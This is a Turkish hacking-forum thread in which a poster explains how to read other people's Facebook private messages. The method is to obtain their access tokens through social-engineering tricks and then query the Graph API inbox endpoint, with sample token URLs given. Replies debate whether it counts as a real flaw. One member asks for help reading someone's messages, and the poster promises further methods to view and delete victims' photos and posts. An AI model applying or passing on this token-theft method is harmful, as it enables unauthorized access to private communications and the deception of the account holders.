Graph.Facebook İle Kişilerin Mesajlarını Okuma // Yeni Açık!

C

criminal king

Uzman üye
21 Ocak 2012
1,457
0
Ottawa
Graph.Facebook İle Kişilerin Mesajlarını Okuma // Yeni Yöntem!

Evet arkadaşlar daha önce bununla iligli birkaç şey duydum fakat anlayamayıp işin içini biraz kurcaladım ve sonunda ne olduğunu çözdüm bu açık diğer facebook kullanıcılarının uygulamalarda vs kullandığı token leri sosyal mühendislik vb yöntemle kullanıcıdan alarak mesajlarına ulaşmanızı sağlıyor.
Açığın Anlatımı :

Hedef Kişiye tokenli durum hilesi vs göndererek hedeften token istenmelidir o token i aldıktan sonra
Kod: 
graph.facebook.com/me//inbox?access_token=tokenkoduburayayapıştırılacak
ve sonra enterladığımızda kullanıcının tüm mesajlarına ulaşmış oluyoruz.. :)
örnek :

sdfpng.png


Örnek Token Linki :
Kod: 
https://www.facebook.com/connect/login_success.html#access_token=CAACIS9ZC8nioBAAmAHqZAUpw3oQa3iweGzFQZACvLkVdV8Q9eVww3rJ4XoLXqeGYjSYrBZB0ijezoFGKv1YnjHchuME7OcYU1tHyiZC2n3m7WDiTYfk1bCes2Ft9K13kyuljQKfsKQr0VQCqFVr8PZAakgqDKpoXıpdfnerjWc9Mr2m7jtogjgkoJNh9zxf4d7HN&expires_in=0
Örnek Graph Mesaj Linki :
Kod: 
https://graph.facebook.com/me/inbox?access_token=CAACIS9ZC8nioBAAmAHqZAUpw3oQa3iweGzFQZACvLkVdV8Q9eVww3rJ4XoLXqeGYjSYrBZB0ijezoFGKv1YnjHchuME7OcYU1tHyiZC2n3m7WDidsfsssrgtrgTYfk1bCes2Ft9K13kyuljQKfsKQr0VQCqFVr8PZAakgqDKpoXWc9Mr2m7koJNh9zxf4d7HN&expires_in=0
Dediğim gibi genelde durum beğendirme sitelerinde vs olur veya facebook ile giriş yap olan siteler de . Kullanıcıdan bu tokeni sosyal mühendislikle alabilirsiniz..


Video Çekilmiştir Arkadaşlar
Criminal King graph facebook mesaj acigi
 
Son düzenleme:
DesDeRe*

DesDeRe*

Kıdemli Üye
3 Nis 2012
3,192
1
STUB
Dostum bi bi açık değil. Bu zaten varolan bir araçtır. Bunun açığını bi hacker bulmuştu diye hatırlıyorum google ye facebook api explorer hacked diye yazarsan bulabilirsin sanırım. Tokeni kendi oluşturup istediği kişinin inbox unu okuyordu. O açıkta kapatılmıştı zaten . Senin anlattığında kişinin mesajını ona token yedirdikten sonra okumayı sağlamak gibi bişey olsa gerek. Bir dahakinde konu baslıgına dikkat edersin kardesim .

İyi forumlar
 
P@cth

P@cth

Analist
22 Tem 2013
888
13
dostum bu açıkla ıraklı halil di galiba facenin sahibini hackledi sonra kapanmıştı yani bilinen bişey ama genede sao l:D
 
C

criminal king

Uzman üye
21 Ocak 2012
1,457
0
Ottawa
DesDeRe*' Alıntı:
Dostum bi bi açık değil. Bu zaten varolan bir araçtır. Bunun açığını bi hacker bulmuştu diye hatırlıyorum google ye facebook api explorer hacked diye yazarsan bulabilirsin sanırım. Tokeni kendi oluşturup istediği kişinin inbox unu okuyordu. O açıkta kapatılmıştı zaten . Senin anlattığında kişinin mesajını ona token yedirdikten sonra okumayı sağlamak gibi bişey olsa gerek. Bir dahakinde konu baslıgına dikkat edersin kardesim .

İyi forumlar
Genişletmek için tıkla ...
Fakat bu karşı tarafın tokeni ile yapılıyor ve denendi çalıştı dostum bu arada ilk kimin bulduğunu öğrendim bilgi için sağol.
Rival' Alıntı:
iş karşı tarafın tokeni öğrenmekte
Genişletmek için tıkla ...
Aynen..
MUhammed xx' Alıntı:
dostum bu açıkla ıraklı halil di galiba facenin sahibini hackledi sonra kapanmıştı yani bilinen bişey ama genede sao l:D
Genişletmek için tıkla ...

Fakat bu açık hala duruyor denendi dostum işe yarıyor hala karşı tarafın token i ni al ve dene görüceksin ;) gerekirse video çeker koyarım
 
DesDeRe*

DesDeRe*

Kıdemli Üye
3 Nis 2012
3,192
1
STUB
criminal king' Alıntı:
Fakat bu karşı tarafın tokeni ile yapılıyor ve denendi çalıştı dostum bu arada ilk kimin bulduğunu öğrendim bilgi için sağol.

Aynen..


Fakat bu açık hala duruyor denendi dostum işe yarıyor hala karşı tarafın token i ni al ve dene görüceksin ;) gerekirse video çeker koyarım
Genişletmek için tıkla ...

tamam zaten ben adamın bulduğu açığın kapandığından bahsettim . Senin söylediğin zaten var olan bişey çalışıyorda . Facebook ta ki bir açık değil yani ben onu anlatmaya çalıştım.
 
P@cth

P@cth

Analist
22 Tem 2013
888
13
criminal king' Alıntı:
Fakat bu karşı tarafın tokeni ile yapılıyor ve denendi çalıştı dostum bu arada ilk kimin bulduğunu öğrendim bilgi için sağol.

Aynen..


Fakat bu açık hala duruyor denendi dostum işe yarıyor hala karşı tarafın token i ni al ve dene görüceksin ;) gerekirse video çeker koyarım
Genişletmek için tıkla ...
bana ömeden mesaj at birininkini okumak istiyo:RpS_confused::RpS_confused:m yardım et adres verecem
 
P@cth

P@cth

Analist
22 Tem 2013
888
13
criminal king' Alıntı:
bikaç gün içerisinde bikaç şey daha buldum mesajla birlikte fotoğraf durum yorum vs bunlar görülebiliniyor silinebiliniyor... yakında paylaşıcam
Genişletmek için tıkla ...
aynen kardeşim bende iki açık buldum :D
aslında bunları bildirsek tht adına bi kasa açıp para burda kulllanılsa yada nebilim işte öle bişeler yapılsa
 
C

criminal king

Uzman üye
21 Ocak 2012
1,457
0
Ottawa
Cevap yazmak için giriş yap yada kayıt ol.
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.